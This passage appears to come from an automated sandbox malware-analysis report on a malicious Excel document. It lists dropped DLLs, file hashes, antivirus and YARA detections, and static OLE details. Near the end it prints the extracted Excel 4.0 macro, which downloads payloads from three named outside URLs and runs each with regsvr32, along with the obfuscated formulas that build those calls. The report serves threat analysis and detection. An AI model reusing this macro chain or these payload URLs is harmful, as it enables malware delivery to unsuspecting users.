                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...j8.b...........".....$.....................a............................................. .........................................E.......(............`..0...............................................(...................................................text...0#.......$.................. .P`.data........@.......(..............@.`..rdata.......P.......6..............@.`@.pdata..0....`.......:..............@.0@.xdata.......p.......>..............@.0@.bss..................................`..edata..E............B..............@.0@.idata..(............D..............@.0..CRT....X............L..............@.@..tls....H............N..............@.`..rsrc................P..............@.0..reloc..............................@.0B................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\242.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1536
                                                                                                                    Entropy (8bit):1.1464700112623651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\Cab806.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                                    File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):61712
                                                                                                                    Entropy (8bit):7.995044632446497
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                                                                    MD5:589C442FC7A0C70DCA927115A700D41E
                                                                                                                    SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                                                                    SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                                                                    SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                                                                    Malicious:false
                                                                                                                    Preview:MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...

                                                                                                                    C:\Users\user\AppData\Local\Temp\Tar807.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                                    File Type:data
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):162298
                                                                                                                    Entropy (8bit):6.30209028339373
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:1ra6crtilgCyNY2IpFQNujcz5YJkKCC/rH8Zz04D8rlCMiB3XlMc6h:1x0imCy6QNujcmJkr97MiVGzh
                                                                                                                    MD5:7EE994C83F2744D702CBA18693ED1758
                                                                                                                    SHA1:17EAA8A28E7ABF096E97537EFE25A34CD7C1FD80
                                                                                                                    SHA-256:5DB917AB6DC8A42A43617850DFBE2C7F26A7F810B229B349E9DD2A2D615671D2
                                                                                                                    SHA-512:D5ED3AD13D58B6D41347D4521F71F9C5DCC3CA706AD1E3A96A9837C8E9087EB511896CA5B49904FC13E6FA176960F4B538379638FCF1D5E8DF6B30072F216BDA
                                                                                                                    Malicious:false
                                                                                                                    Preview:0..y...*.H.........y.0..y....1.0...`.H.e......0..jC..+.....7.....j30..j.0...+.....7........{.ZV....220608070702Z0...+......0..i.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFA00266093586698C.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):28672
                                                                                                                    Entropy (8bit):3.2485849005107266
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:ADMPKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+Vyq:AYKpb8rGYrMPe3q7Q0XV5xtezE8vG8U7
                                                                                                                    MD5:27D3AABED2D8938973EB8824732687BA
                                                                                                                    SHA1:24D9540BDD0EF40C1A74148B1E940478BD01FD5A
                                                                                                                    SHA-256:9D0101BC81982ACA7CC528CC7AE03BAE8455F5CD7267B3A5D0EB87D68C7E63EA
                                                                                                                    SHA-512:D691693C1D0FEFB0FE19F06930F4120D3E80A9A8FE33D6CFA2F2183BA6AA368DF21806AD895815FFB8070BC2E175D0E8722AA9CC4AF1A0A5263EB4FCFDC72139
                                                                                                                    Malicious:false
                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFEE5B54DDC882DEE7.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\Desktop\documentazione 68668.xls

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Jun 8 07:41:36 2022, Security: 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):47616
                                                                                                                    Entropy (8bit):4.438050729410308
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:eDMPKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+Vyis73q/44fq/uVD:eYKpb8rGYrMPe3q7Q0XV5xtezE8vG8Uz
                                                                                                                    MD5:FC28C99A70312977C4756F10A1FEBD29
                                                                                                                    SHA1:CDB554A798592B4469CBEFB8A93C2BD8DA632F35
                                                                                                                    SHA-256:6774ED57B825C1D8126F27F36323DFFD9CD8AC7CE3B7AED0ABB856587708986A
                                                                                                                    SHA-512:14573525384C24EB35B4A08169A3B49E268230976F4029113E46620B6E806413494E100AD34746BD0595E9362B3036FF593E7DEB5FB1269154FB4569BF513846
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\documentazione 68668.xls, Author: John Lambert @JohnLaTwC
                                                                                                                    Preview:......................>.......................[...........................Z...........................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....userTH B.....a.........=.................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......

                                                                                                                    C:\Users\user\wdusx2.ocx

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):661504
                                                                                                                    Entropy (8bit):4.956080357124322
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HioEnJyVLryVLryVLryVLryVLryVLryVLGLO8yMZodxz51dPRHh+u392986Ugn:CAYYYYYY6a8S91d5Yu3w+6
                                                                                                                    MD5:3F418FE2743B42214FC4A6D6BDD15A13
                                                                                                                    SHA1:45A780014944CB01407EAB26D0E472C7E37D4963
                                                                                                                    SHA-256:1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
                                                                                                                    SHA-512:1CEE67179EBC7E000F1CA8AAF7BC88603A19A9A0352B1CE751DFFC3EE660211236BDF1F6C2E6BEED4503FC960E128D21230032E6EF0776058FCE26C195E1B00F
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Metadefender, Detection: 40%, Browse
                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: DOC 18860.xls, Detection: malicious, Browse
                                                                                                                    • Filename: 9880-0806.xls, Detection: malicious, Browse
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...j8.b...........".....$.....................a............................................. .........................................E.......(............`..0...............................................(...................................................text...0#.......$.................. .P`.data........@.......(..............@.`..rdata.......P.......6..............@.`@.pdata..0....`.......:..............@.0@.xdata.......p.......>..............@.0@.bss..................................`..edata..E............B..............@.0@.idata..(............D..............@.0..CRT....X............L..............@.@..tls....H............N..............@.`..rsrc................P..............@.0..reloc..............................@.0B................................................................................................................................

                                                                                                                    C:\Users\user\wdusx3.ocx

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6424
                                                                                                                    Entropy (8bit):5.110994009346991
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:vGzZELraVLYVQyS2qiCquqHlmRxMsVoWQ2z1:KZELraVUVZfqquq0jaIz1
                                                                                                                    MD5:2826B1E7AF14A75FEE51D4E4534EEFF5
                                                                                                                    SHA1:C9EAB9B2B15CFFC0273B3F8D197007B025018838
                                                                                                                    SHA-256:8CC3FE518E10BFEDD841106B51A5B0FBC337161CFC4D7360DB0436EE9D1A68E5
                                                                                                                    SHA-512:1C77D4A9EDE815B53DF07220742E43A180097F066BE9A6C3AC22F573910955DDB0047700F9F277BD6C794D8560865AD28CF58DE40BB1F939EA4C8CF7F28BA39E
                                                                                                                    Malicious:false
                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.. <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" /><meta name="robots" content="noindex, nofollow" /> <title>iPage</title> <link rel="stylesheet" type="text/css" href="http://www1.ipage.com/xslt/elements/generic_csscomponent.css" /> <script src="http://www1.ipage.com/generalAppC/scriptcat/87ae207201c55b84c5270851159260e1.1" type="text/javascript"></script></head><body id="stylesheet1"><style>#nav li {display: inline-block;}a.nav-thin-right {padding: 0 30px;}#nav li a.loginkey, #nav li a.loginkey:hover {background-position: -8px -8px;}</style> <div id="doc2" class="yui-t2"> <div id="hd" style="width: 950px;"> <div id="masthead" style="position: relative;"> <h1><a href="http://www.ipage.com/">iPage</a></h1> <h2>Powerful Web Hosting and Domain Names for Home and Business</h2><img src="http:

                                                                                                                    C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy)

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):661504
                                                                                                                    Entropy (8bit):4.956080357124322
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HioEnJyVLryVLryVLryVLryVLryVLryVLGLO8yMZodxz51dPRHh+u392986Ugn:CAYYYYYY6a8S91d5Yu3w+6
                                                                                                                    MD5:3F418FE2743B42214FC4A6D6BDD15A13
                                                                                                                    SHA1:45A780014944CB01407EAB26D0E472C7E37D4963
                                                                                                                    SHA-256:1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
                                                                                                                    SHA-512:1CEE67179EBC7E000F1CA8AAF7BC88603A19A9A0352B1CE751DFFC3EE660211236BDF1F6C2E6BEED4503FC960E128D21230032E6EF0776058FCE26C195E1B00F
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Metadefender, Detection: 40%, Browse
                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: DOC 18860.xls, Detection: malicious, Browse
                                                                                                                    • Filename: 9880-0806.xls, Detection: malicious, Browse
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...j8.b...........".....$.....................a............................................. .........................................E.......(............`..0...............................................(...................................................text...0#.......$.................. .P`.data........@.......(..............@.`..rdata.......P.......6..............@.`@.pdata..0....`.......:..............@.0@.xdata.......p.......>..............@.0@.bss..................................`..edata..E............B..............@.0@.idata..(............D..............@.0..CRT....X............L..............@.@..tls....H............N..............@.`..rsrc................P..............@.0..reloc..............................@.0B................................................................................................................................

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Jun 8 07:41:36 2022, Security: 0
                                                                                                                    Entropy (8bit):4.4366946198152215
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                    File name:documentazione 68668.xls
                                                                                                                    File size:47616
                                                                                                                    MD5:a4c856aa217eab1f66dfade13f701013
                                                                                                                    SHA1:c4bd8e7e5cbb3e8038186851e7eb9ee65007c64d
                                                                                                                    SHA256:51737c16eed7b848b37b843555c7bda5ead1f418fbadb8def452d287d0817179
                                                                                                                    SHA512:ea03f122caa5b5d019c122827c895b447f40d796574cd3ae8206e52d412dd9f9cb95d51decf8167de4d42a3a21068b841ab06a9616de22e676271945eb54ae0e
                                                                                                                    SSDEEP:768:hDMPKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+Vyis73q/44fq/uVR:hYKpb8rGYrMPe3q7Q0XV5xtezE8vG8Uh
                                                                                                                    TLSH:1423B546BB5AC85DF915873448E747EA7323EC314F6B07833669B3256FF88A05A0325B
                                                                                                                    File Content Preview:........................>.......................[...........................Z..................................................................................................................................................................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:e4eea286a4b4bcb4

                                                                                                                    Static OLE Info

                                                                                                                    General

                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1

                                                                                                                    OLE File "documentazione 68668.xls"

                                                                                                                    Indicators
                                                                                                                    Has Summary Info:
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:False
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:False
                                                                                                                    Flash Objects Count:0
                                                                                                                    Contains VBA Macros:False
                                                                                                                    Summary
                                                                                                                    Code Page:1251
                                                                                                                    Author:Dream
                                                                                                                    Last Saved By:TYHRETH
                                                                                                                    Create Time:2015-06-05 18:19:34
                                                                                                                    Last Saved Time:2022-06-08 06:41:36
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:0
                                                                                                                    Document Summary
                                                                                                                    Document Code Page:1251
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Company:
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:1048576

                                                                                                                    Streams

                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.5362437358174649
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . d . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . E S R S G B 1 . . . . . E G S H R H V 2 . . . . . E S H V G R E R 3 . . . . . P K E K P P G E K K P G E . . . . . M N
                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 64 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 fb 00 00 00
                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.2811000845961033
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D r e a m . . . . . . . . . . . T Y H R E T H . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . . . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 37656
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:37656
                                                                                                                    Entropy:5.157896293392311
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T Y H R E T H B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . V e 1 8 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 07 00 00 54 59 48 52 45 54 48 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                    Macro 4.0 Code

                                                                                                                    Name:PKEKPPGEKKPGE
                                                                                                                    Extraction:dynamic
                                                                                                                    Type:4
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    2,5,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.zardamarine.com/images/psQbAjrrEOXWPrS/","..\wdusx1.ocx",0,0)",F13)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx")",F17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kronostr.com/tr/68yHRhfuU7Qj/","..\wdusx2.ocx",0,0)",F19)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx")",F21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/","..\wdusx3.ocx",0,0)",F23)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx")",F25)=FORMULA("=RETURN()",F35)
                                                                                                                    Name:PKEKPPGEKKPGE
                                                                                                                    Extraction:dynamic
                                                                                                                    Type:4
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    2,5,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.zardamarine.com/images/psQbAjrrEOXWPrS/","..\wdusx1.ocx",0,0)",F13)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx")",F17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kronostr.com/tr/68yHRhfuU7Qj/","..\wdusx2.ocx",0,0)",F19)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx")",F21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/","..\wdusx3.ocx",0,0)",F23)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx")",F25)=FORMULA("=RETURN()",F35)
12,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.zardamarine.com/images/psQbAjrrEOXWPrS/","..\wdusx1.ocx",0,0)
16,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx")
18,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kronostr.com/tr/68yHRhfuU7Qj/","..\wdusx2.ocx",0,0)
20,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx")
22,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/","..\wdusx3.ocx",0,0)
24,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx")
34,5,=RETURN()
                                                                                                                    Name:PKEKPPGEKKPGE, Macrosheet
                                                                                                                    Extraction:static
                                                                                                                    Type:unknown
                                                                                                                    Final:unknown
                                                                                                                    Visible:True
                                                                                                                    Protected:unknown
                                                                                                                    SHEET: PKEKPPGEKKPGE, Macrosheet
CELL:F3, =(((((FORMULA(((((((((((((('ESRSGB1'!L24&'ESRSGB1'!L26)&'ESRSGB1'!L27)&'ESRSGB1'!L28)&'ESRSGB1'!L28)&'EGSHRHV2'!B3)&'EGSHRHV2'!E9)&'EGSHRHV2'!G12)&'ESRSGB1'!F10)&'EGSHRHV2'!J6)&'ESHVGRER3'!D4)&'EGSHRHV2'!F16)&'ESHVGRER3'!Q10)&'ESHVGRER3'!C11)&'ESHVGRER3'!O19,F13)=FORMULA((((((((((((((((((('ESRSGB1'!L24&'ESRSGB1'!G8)&'ESRSGB1'!F4)&'ESRSGB1'!G8)&'ESRSGB1'!O3)&'ESRSGB1'!L30)&'ESRSGB1'!F24)&'ESRSGB1'!O3)&'ESHVGRER3'!Q17)&'ESHVGRER3'!R12)&'ESRSGB1'!A4)&'ESHVGRER3'!P23)&'ESRSGB1'!A4)&'ESHVGRER3'!D25)&'ESRSGB1'!F10)&'ESHVGRER3'!E20)&'ESHVGRER3'!M13)&'ESHVGRER3'!C11)&'ESRSGB1'!F24)&'ESRSGB1'!L31,F17))=FORMULA(((((((((((((('ESRSGB1'!L24&'ESRSGB1'!L26)&'ESRSGB1'!L27)&'ESRSGB1'!L28)&'ESRSGB1'!L28)&'EGSHRHV2'!B3)&'EGSHRHV2'!E9)&'EGSHRHV2'!G12)&'ESRSGB1'!F10)&'EGSHRHV2'!J6)&'ESHVGRER3'!D4)&'EGSHRHV2'!G18)&'ESHVGRER3'!Q10)&'ESHVGRER3'!H7)&'ESHVGRER3'!O19,F19))=FORMULA((((((((((((((((((('ESRSGB1'!L24&'ESRSGB1'!G8)&'ESRSGB1'!F4)&'ESRSGB1'!G8)&'ESRSGB1'!O3)&'ESRSGB1'!L30)&'ESRSGB1'!F24)&'ESRSGB1'!O3)&'ESHVGRER3'!Q17)&'ESHVGRER3'!R12)&'ESRSGB1'!A4)&'ESHVGRER3'!P23)&'ESRSGB1'!A4)&'ESHVGRER3'!D25)&'ESRSGB1'!F10)&'ESHVGRER3'!E20)&'ESHVGRER3'!M13)&'ESHVGRER3'!H7)&'ESRSGB1'!F24)&'ESRSGB1'!L31,F21))=FORMULA(((((((((((((('ESRSGB1'!L24&'ESRSGB1'!L26)&'ESRSGB1'!L27)&'ESRSGB1'!L28)&'ESRSGB1'!L28)&'EGSHRHV2'!B3)&'EGSHRHV2'!E9)&'EGSHRHV2'!G12)&'ESRSGB1'!F10)&'EGSHRHV2'!J6)&'ESHVGRER3'!D4)&'EGSHRHV2'!H16)&'ESHVGRER3'!Q10)&'ESHVGRER3'!K15)&'ESHVGRER3'!O19,F23))=FORMULA((((((((((((((((((('ESRSGB1'!L24&'ESRSGB1'!G8)&'ESRSGB1'!F4)&'ESRSGB1'!G8)&'ESRSGB1'!O3)&'ESRSGB1'!L30)&'ESRSGB1'!F24)&'ESRSGB1'!O3)&'ESHVGRER3'!Q17)&'ESHVGRER3'!R12)&'ESRSGB1'!A4)&'ESHVGRER3'!P23)&'ESRSGB1'!A4)&'ESHVGRER3'!D25)&'ESRSGB1'!F10)&'ESHVGRER3'!E20)&'ESHVGRER3'!M13)&'ESHVGRER3'!K15)&'ESRSGB1'!F24)&'ESRSGB1'!L31,F25))=FORMULA((('ESRSGB1'!L24&'